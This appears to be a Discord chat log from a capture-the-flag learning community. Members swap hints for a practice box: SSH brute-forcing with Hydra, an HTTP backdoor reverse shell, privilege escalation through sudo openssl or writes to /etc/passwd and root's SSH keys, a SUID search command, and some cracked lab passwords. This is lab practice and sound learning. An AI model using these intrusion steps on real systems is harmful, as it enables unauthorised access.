This time on the show, Local and Remote forwarding with SSH, Persistent connections in Linux with AutoSSH, Windows tunnels that don't quit with a GUI front-end for Plink and a whole lot of technolust. All that and more, this time on Hak5!

▶ Play video
lofty moat
#

i see 0day's page opened in another tab 👀

#

is it ok if i type my story?

plucky vault
fathom coyote
visual wyvern
#

clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR

lofty moat
#

once upon a time, it is the story from 2014 an online friend of mine got his FB account got hacked(thats what he told me) with whom i used to play some online facebook game i knew how to a lil about phishing about that time nothing special. one of my friends from academy used brag about how he knows how to hack facebook. i asked him if he could recover he just said some stuff like he goes to inspect element and do this thing and that and gets into the user account. He was saying it with such confidence i believed him. i just went home and started looking into it what he said.. then i realized he was just lying he dont know a thing about hacking. thats when i heard about kali and installed it. i used kali for like a year or two whenever i was free. i learnt how to use metasploit, a couple of other tools as well. i hacked my own windows 7 machine at that time with some trojhans and stuff. started looking into keyloggers. after that i reinstalled windows for some reason and never got a chance to reinstall it till 3 months ago. and started THM after that.

fathom coyote
#

It seems a lot that people pick up hacking for a reason, then drop it for years and try to pick it up again later as an actual thing. I like solving puzzles and that's basically what hacking is. Doing proper hacking sounds like a great time. I'd definitely love to especially dig into the social engineering/lock picking part, too. At least that's what I'll Let Myself In got me thinking about. Most people don't expect a girl to walk in and actually be malicious. I'm glad it doesn't surprise anyone here that I'm a bit of a deviant, but most people don't expect it of me. "Girls don't do that" is normally the answer I get and it makes sense to me to exploit that weakness. If there's an obvious hole, you should absolutely exploit it.

#

I'm muted atm, I have some music on while I actually do my homework right now. I gotta get it turned in before Sunday so I want to make sure that's done so I'm not freaking out later. 🙂

#

Also deafened via hardware so I can put music through my ears instead of chatter.

lofty moat
#

The struggle is real :D
Translation:
He:Bro i want to learn hacking.
He: I saw you comments of facebook
Me:Yeah, What you want to learn?

#

@slim sage off topic but Dota > LOL

#

oh its @fossil estuary i checked your site its really good <3
briskets.io

fossil estuary
#

thanks @lofty moat . I appreciate it

lofty moat
#

i cant talk but i hear ya 😄

#

Offensive pentest = OSCP path

#

a KOTH match really quick? if anyone wants to play ever just ping me

fossil estuary
lofty moat
#

@visual wyvern are you doing Game Zone?

plucky vault
#

Sorry my dad was on my computer.

#

Clicking shit.

#

Don't say anything through the microphone coz he's here.

plucky vault
#

@merry valve okay watch

lofty moat
#

..

#

is it your first time doing hackers?

midnight fern
#

Yeah

tame ether
midnight fern
#

What am I missing here?

#

This is taking too long for a KOTH box

tame ether
#

no idea lol

lofty moat
#

i wasnt here. what was he asking about missing?

midnight fern
#

I have nothing but FTP anon

#

and some possible usernames

#

First time doing Hackers

#

Does anyone know if what I'm doing is the right path?

#

This is taking forever

lofty moat
#

want spoilers?

midnight fern
#

Sure

lofty moat
#

plague is the user for that http

midnight fern
#

Good

#

So I was right on that part

#

Why is it taking forever? This is supposed to be fast paced right?

lofty moat
#

just brute force on that, its the easier path

midnight fern
#

I am brute forcing that backdoor with plague

#

36k tries so far

lofty moat
#

can i dm you my command for this brute force?

#

and you can compare

midnight fern
#

Sure

lofty moat
midnight fern
#

I'll give it 5 more mins

#

if nothing, I'm rage quitting

#

this is boring

#

@lofty moat confirmed that I have to use Hydra, I am assuming this box had way more resources when it was a KOTH.

#

Ending one

#

to boost the other

lofty moat
#

or may be play a KOTH machine instead?

midnight fern
#

I am not into the KOTH life

valid night
#

@midnight fern not very PG-13 of you 😉

midnight fern
#

I played it twice, I think it's fun to watch.

lofty moat
#

play against Will 😛

valid night
#

He'd beat me with little effort

midnight fern
#

lol

lofty moat
#

check DM 😄

midnight fern
#

I am stuck on a bruteforce right now

lofty moat
#

idk what is wrong but xD

#

btw in Hackers it will always newly generate on every new game. (id_rsa,passwords)

#

password for ftp and ssh user is the same

#

all caps?

#

yeah

#

gg

#

i still dont know why its not showing you result for plague

#

try plague. you have the credentials

#

the http backdoor

#

yeah

#

you cant change directory from that backdoor.. its just to get reverse shell

#

i think ^

#

yeah Hackers is by James

#

nah never tried that

#

you can but i want to see that binary in action

#

well not that sudo one but you can read write with openssl

#

sooo

#

so just sudo openssl any you like to read/write

midnight fern
#

Binary worked

#

For the new box as well

lofty moat
#

Noice

midnight fern
#

If you haven't done it

lofty moat
#

the binary is good but i simply just add my ssh key in root ssh. and ssh into root. or you can write in /etc/passwd for your new user

#

Dont grab those. they are useless

#

They are always newly generated. Passwords and ssh keys

#

i challenge you to privesc from that 😄 😛

#

i havent done that yet..

#

its the easiest to brute force in. simple ssh brute force

#

no

#

tried twice. couldnt find the way

#

find / -perm -4000 2>/dev/null if thats what you looking for?

#

No

#

i just did that plague brute force nothing else after that

#

i know this 😛

#

Wonderland

#

used the same method

#

everyone close your eyes 😄

#

Noice
kekw

#

There's still one that i dont know of

#

James said direct root shell in one minute

#

There was one glitch before.. you could just access that /backdoor/shell by setting session token to nothing. and get reverse shell. but james fixed that. i think there should be something related to that with this here.

#

yeah

#

you can access /backdoor/shell by changing post to get request in burp(Thats the way i did it) and if you were to type anything in here it would say invalid session token or something like that

#

If you go in /backdoor and change post request to get request and then access /backdoor/shell it wont kick you out. you can type commands in there but it would say session token invalid

#

Yeah there is

#

This ^^^

#

Ok

#

in the mean time if anyone wants to play koth??

#

i am always up for some koth games

lofty moat
#

Remember he said "no credentials required"

#

i was reading that

midnight fern
#

@forest python

#

I need you

supple trellis
#

which room is this ?

lofty moat
#

When "Session token" was a thing

#

i can brute force in but is it ok if i grab that binary from your ip? @midnight fern

#

imma try as well to find that way

#

thanks

supple trellis
#

@midnight fern look closely to that binwalk output

midnight fern
#

@forest python All 6 chars

lofty moat
#

well it is from rockyou. so may be try comparing?

midnight fern
#

with no line breaks?

fast wind
#

is that hackers i am seeing?

#

xD

lofty moat
#

is that hackers i am seeing?
@fast wind he's trying to find that insta root

fast wind
#

ah I thought that was patched?

lofty moat
fast wind
#

Ah dangit, I never tried looking for it when Ninja said that its removed(I think he said that (short term mem))

lofty moat
#

ah I thought that was patched?
@fast wind not that insta root but a better way of brute forcing. if you can figure out how wordlist is made

fast wind
#

Ah! That is something!

full sapphire
#

Haha

#

The wordlist is made the exact same way as in Fortune

#

Good luck 😁

fast wind
#

The wordlist is made the exact same way as in Fortune
@full sapphire Copy that down copy that down!

upper path
#

There are tools to make custom wordlists

lofty moat
#

well if you can just make a custom wordlist from rock you of just 6,7 letters it will be faster.
i didnt saved passwords but these are the ones that i got before:
teresa , donegal,england.
I am not sure about that ihateboys one, if it was from hackers or fortune.

#

lemme check if i have saved passwords in firefox

#

Those are the passwords that i ever got, see if that help smh:
wafako 123321123 120689 blue10 melrose ihateboys

fast wind
#

some of them look like passes for sure

#

coincidence prolly